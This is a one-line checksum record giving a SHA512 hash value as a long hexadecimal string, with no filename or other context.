SHA512fd330f865bde2f23dfc12979f022caf79d6f43ce3bb5e2f40c3e2ea1c9bc3fbf5c5f7f28c7a5eb436a37b793004b41dfe10d5443a1a92fc966136301e4187525